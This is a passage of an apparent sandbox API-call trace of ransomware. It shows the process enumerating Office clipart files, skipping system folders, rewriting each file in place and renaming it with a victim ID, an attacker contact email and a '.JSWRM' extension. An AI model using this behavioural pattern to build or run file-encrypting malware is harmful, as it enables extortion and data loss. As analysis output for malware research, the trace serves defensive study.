[0081.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0081.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0081.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0081.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0081.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0081.885] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3490, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107150.WMF", cAlternateFileName="")) returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2=".") returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="..") returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="...") returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="windows") returned -1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="recovery") returned -1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="perflogs") returned -1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="documents and settings") returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="system volume information") returned -1 [0081.885] lstrcmpiW (lpString1="J0107150.WMF", lpString2="msocache") returned -1 [0081.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0081.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107150.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107150.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107150.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0081.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0081.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107150.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107150.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107150.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0081.885] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0081.885] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0081.885] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.886] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0081.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.886] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13456) returned 1 [0081.886] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.886] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3490) returned 0x24d210 [0081.886] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3490, lpOverlapped=0x0) returned 1 [0081.888] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.888] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3490, lpOverlapped=0x0) returned 1 [0081.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.889] CloseHandle (hObject=0x314) returned 1 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0081.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0081.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0081.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0081.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0081.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0081.890] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5804, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107152.WMF", cAlternateFileName="")) returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2=".") returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="..") returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="...") returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="windows") returned -1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="recovery") returned -1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="perflogs") returned -1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="documents and settings") returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="system volume information") returned -1 [0081.890] lstrcmpiW (lpString1="J0107152.WMF", lpString2="msocache") returned -1 [0081.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107152.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107152.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107152.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0081.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107152.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107152.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107152.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0081.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0081.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.891] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22532) returned 1 [0081.891] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5800) returned 0x24d210 [0081.891] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5800, lpOverlapped=0x0) returned 1 [0081.894] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.894] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5800, lpOverlapped=0x0) returned 1 [0081.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.894] CloseHandle (hObject=0x314) returned 1 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0081.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0081.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0081.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.895] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0081.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0081.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0081.895] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe69d9e5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x571c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107154.WMF", cAlternateFileName="")) returned 1 [0081.895] lstrcmpiW (lpString1="J0107154.WMF", lpString2=".") returned 1 [0081.895] lstrcmpiW (lpString1="J0107154.WMF", lpString2="..") returned 1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="...") returned 1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="windows") returned -1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="recovery") returned -1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="perflogs") returned -1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="documents and settings") returned 1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="system volume information") returned -1 [0081.896] lstrcmpiW (lpString1="J0107154.WMF", lpString2="msocache") returned -1 [0081.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107154.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107154.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107154.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0081.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107154.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107154.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107154.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0081.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0081.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.915] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22300) returned 1 [0081.915] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.915] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5710) returned 0x24d210 [0081.915] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5710, lpOverlapped=0x0) returned 1 [0081.917] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.917] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5710, lpOverlapped=0x0) returned 1 [0081.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.918] CloseHandle (hObject=0x314) returned 1 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0081.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0081.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0081.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0081.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.918] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.919] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0081.919] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, 